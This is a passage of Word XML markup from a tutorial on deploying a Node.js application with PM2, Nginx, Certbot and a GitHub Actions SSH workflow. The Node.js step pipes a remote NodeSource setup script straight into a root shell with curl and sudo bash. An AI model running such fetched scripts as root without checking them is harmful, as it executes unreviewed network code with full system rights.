    <w:p w14:paraId="4A45FD44" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 3: Install Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330F52A2"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curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE1E42B"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sudo apt-get install -y nodejs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFB453A" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 4: Install a Process Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use a process manager like </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PM2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> to keep your Node.js application running, even after a server restart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6F5924"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sudo npm install -g pm2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBB89F3" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 5: Install a Web Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Install and configure </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a reverse proxy to handle HTTP requests and forward them to your Node.js application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E720C38"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sudo apt-get install nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284BBA7B" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. Deploy the Node.js Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3DB727" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 1: Transfer Files to the Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use scp, rsync, or a Git repository to transfer your application code to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DF1040"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scp -r /path/to/your/app username@your_server_ip:/var/www/yourapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F5DB6" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 2: Install Dependencies on the Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH into your server and navigate to the application directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06582683"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cd /var/www/yourapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECA1294"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npm install --production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2937B14D" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 3: Start the Application with PM2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246A852E"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pm2 start app.js --name "yourapp"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258408BC"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pm2 save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554FD1AA"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pm2 startup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722B3787" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PM2 will generate a startup script to automatically start your app on server reboot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFE2EE6" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 4: Configure Nginx as a Reverse Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create a new Nginx configuration file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408518CC"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sudo nano /etc/nginx/sites-available/yourapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1518EF" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Add the following configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C23B989"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server {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0191C1D9"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listen 80;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC645B9"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server_name your_domain_or_ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046DA447"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7D43DD1B"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location / {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F86402F"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proxy_pass http://localhost:3000; # Assuming your Node.js app runs on port 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5909CA"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proxy_http_version 1.1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED96580"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proxy_set_header Upgrade $http_upgrade;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45178E2E"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proxy_set_header Connection 'upgrade';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B65AC5"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proxy_set_header Host $host;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C50C28"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proxy_cache_bypass $http_upgrade;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23705D82"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8C00B2F"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A79E46F" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Enable the configuration and restart Nginx:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D91B098" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pP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sudo ln -s /etc/nginx/sites-available/yourapp /etc/nginx/sites-enabled/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29306A52" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pP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sudo nginx -t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416BA0FC" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pP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sudo systemctl restart nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590BAB2D" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Set Up Domain and SSL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB2D010" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Point Domain to Server:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Update your DNS records to point your domain to the server’s IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E4D32C" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Set Up SSL with Let's Encrypt:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Certbot to obtain and renew SSL certificates automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8A5B44"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sudo apt-get install certbot python3-certbot-nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DBFB45"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sudo certbot --nginx -d your_domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17436F6B" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. Monitoring and Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11161E30" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PM2 Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use pm2 monit to monitor your application’s performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1890C166" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Log Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> PM2 automatically logs output to ~/.pm2/logs. You can also integrate with services like Loggly, Datadog, or ELK Stack for advanced log management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0458351C" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7. Continuous Deployment (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FA187C" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use CI/CD tools like GitHub Actions, GitLab CI, Jenkins, or CircleCI to automate deployments whenever you push to the main branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038A386C" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example CI/CD pipeline using GitHub Actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1BA57C"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name: Deploy Node.js app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA83F5E"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793D143"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on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCFE88E"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push:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F197B09"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branches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F91CDE0"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main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179400C4"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23EE1262"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jobs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F43EF66"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build:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4405ED"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runs-on: ubuntu-latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A44844"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steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21751339"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uses: actions/checkout@v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236F463A"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name: Install Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE5F4B6"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uses: actions/setup-node@v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E9DB8F"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with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6498D716"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node-version: '18'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56805489"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 run: npm install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1437FB0B"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run: npm test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A67E5B"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084A4D17"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deploy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257C31A4"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needs: build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28892297"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runs-on: ubuntu-latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3000D5AB"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steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B11E0A8"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name: Deploy to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E45735"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uses: easingthemes/ssh-deploy@v2.1.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF285B7"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env:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0081D1"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SSH_PRIVATE_KEY: ${{ secrets.SSH_PRIVATE_KEY }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A80FB93"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ARGS: "-rltgoDzvO --delete"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21402FA3"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SOURCE: "./"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36705602"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REMOTE_HOST: ${{ secrets.REMOTE_HOST }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA063BF"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REMOTE_USER: ${{ secrets.REMOTE_USER }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1F41C5" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64C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TARGET: "/var/www/yourapp"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2B02EC" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8. Scaling and Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791C0833" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
